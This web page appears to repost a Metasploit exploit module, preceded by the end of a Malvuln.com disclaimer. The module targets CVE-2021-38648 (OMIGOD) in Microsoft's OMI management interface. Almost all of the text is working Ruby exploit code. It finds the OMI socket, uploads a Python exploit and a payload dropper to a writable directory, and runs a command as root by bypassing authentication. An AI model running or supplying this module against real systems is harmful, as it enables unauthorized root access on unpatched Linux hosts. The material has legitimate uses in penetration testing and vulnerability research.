author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Local<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Post::File<br /> include Msf::Post::Process<br /> include Msf::Exploit::EXE<br /> include Msf::Exploit::FileDropper<br /><br /> DEFAULT_SERVER_BIN_PATH = '/opt/omi/bin/omiserver'.freeze<br /> DEFAULT_SOCKET_PATH = '/var/opt/omi/run/omiserver.sock'.freeze<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Microsoft OMI Management Interface Authentication Bypass',<br /> 'Description' => %q{<br /> By removing the authentication exchange, an attacker can issue requests to the local OMI management socket<br /> that will cause it to execute an operating system command as the root user. This vulnerability was patched in<br /> OMI version 1.6.8-1 (released September 8th 2021).<br /> },<br /> 'References' => [<br /> ['CVE', '2021-38648'],<br /> ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38648'],<br /> ['URL', 'https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure'],<br /> ['URL', 'https://attackerkb.com/topics/08O94gYdF1/cve-2021-38647']<br /> ],<br /> 'Author' => [<br /> 'Nir Ohfeld', # vulnerability discovery & research<br /> 'Shir Tamari', # vulnerability discovery & research<br /> 'Spencer McIntyre' # metasploit module<br /> ],<br /> 'DisclosureDate' => '2021-09-14',<br /> 'License' => MSF_LICENSE,<br /> 'Platform' => ['linux', 'unix'],<br /> 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],<br /> 'SessionTypes' => ['shell', 'meterpreter'],<br /> 'Targets' => [<br /> [<br /> 'Unix Command',<br /> {<br /> 'Platform' => 'unix',<br /> 'Arch' => ARCH_CMD,<br /> 'Type' => :unix_cmd,<br /> 'Payload' => { 'DisableNops' => true, 'Space' => 256 }<br /> }<br /> ],<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'Arch' => [ARCH_X86, ARCH_X64],<br /> 'Type' => :linux_dropper<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 1,<br /> 'DefaultOptions' => {<br /> 'MeterpreterTryToFork' => true<br /> },<br /> 'Notes' => {<br /> 'AKA' => ['OMIGOD'],<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /><br /> register_advanced_options([<br /> OptString.new('WritableDir', [ true, 'A directory where you can write files.', '/tmp' ]),<br /> OptString.new('SocketPath', [ false, 'The path to the OMI server socket.', '' ])<br /> ])<br /> end<br /><br /> def check<br /> pid = pidof('omiserver').first<br /> return CheckCode::Safe('The omiserver process was not found.') if pid.nil?<br /><br /> omiserver_bin = read_file("/proc/#{pid}/cmdline").split("\x00", 2).first<br /> omiserver_bin = DEFAULT_SERVER_BIN_PATH if omiserver_bin.blank? && file?(DEFAULT_SERVER_BIN_PATH)<br /> return CheckCode::Unknown('Failed to find the omiserver binary path.') if omiserver_bin.blank?<br /><br /> vprint_status("Found #{omiserver_bin} running in PID: #{pid}")<br /> if cmd_exec("#{omiserver_bin} --version") =~ /\sOMI-(\d+(\.\d+){2,3}(-\d+)?)\s/<br /> version = Regexp.last_match(1)<br /> else<br /> return CheckCode::Unknown('Failed to identify the version of the omiserver binary.')<br /> end<br /><br /> return CheckCode::Safe("Version #{version} is not affected.") if Rex::Version.new(version) > Rex::Version.new('1.6.8-0')<br /><br /> CheckCode::Appears("Version #{version} is affected.")<br /> end<br /><br /> def upload(path, data)<br /> print_status "Writing '#{path}' (#{data.size} bytes) ..."<br /> write_file path, data<br /> ensure<br /> register_file_for_cleanup(path)<br /> end<br /><br /> def find_exec_program<br /> %w[python python3 python2].select(&method(:command_exists?)).first<br /> end<br /><br /> def get_socket_path<br /> socket_path = datastore['SocketPath']<br /> return socket_path unless socket_path.blank?<br /><br /> pid = pidof('omiserver').first<br /> fail_with(Failure::NotFound, 'The omiserver pid was not found.') if pid.nil?<br /><br /> if read_file("/proc/#{pid}/net/unix") =~ %r{\s(/(\S+)server\.sock)$}<br /> socket_path = Regexp.last_match(1)<br /> else<br /> begin<br /> socket_path = DEFAULT_SOCKET_PATH if stat(DEFAULT_SOCKET_PATH).socket?<br /> rescue StandardError # rubocop:disable Lint/SuppressedException<br /> end<br /> end<br /><br /> fail_with(Failure::NotFound, 'The socket path could not be found.') if socket_path.blank?<br /><br /> vprint_status("Socket path: #{socket_path}")<br /> socket_path<br /> end<br /><br /> def exploit<br /> python_binary = find_exec_program<br /> fail_with(Failure::NotFound, 'The python binary was not found.') unless python_binary<br /><br /> vprint_status("Using '#{python_binary}' to run the exploit")<br /> socket_path = get_socket_path<br /> path = datastore['WritableDir']<br /> python_script = rand_text_alphanumeric(5..10) + '.py'<br /><br /> case target['Type']<br /> when :unix_cmd<br /> root_cmd = payload.encoded<br /> when :linux_dropper<br /> unless path.start_with?('/')<br /> # the command will be executed from a different working directory so use an absolute path<br /> fail_with(Failure::BadConfig, 'The payload path must be an absolute path.')<br /> end<br /><br /> payload_path = "#{path}/#{rand_text_alphanumeric(5..10)}"<br /> if payload_path.length > 256<br /> # the Python exploit uses a hard-coded exchange that only allows up to 256 characters to be included in the<br /> # command that is executed<br /> fail_with(Failure::BadConfig, 'The payload path is too long (>256 characters).')<br /> end<br /><br /> upload(payload_path, generate_payload_exe)<br /> cmd_exec("chmod +x '#{payload_path}'")<br /> root_cmd = payload_path<br /> end<br /><br /> upload("#{path}/#{python_script}", exploit_data('CVE-2021-38648', 'cve_2021_38648.py'))<br /> cmd = "#{python_binary} #{path}/#{python_script} -s '#{socket_path}' '#{root_cmd}'"<br /> vprint_status("Running #{cmd}")<br /> output = cmd_exec(cmd)<br /> vprint_line(output) unless output.blank?<br /> end<br />end<br /></code></pre>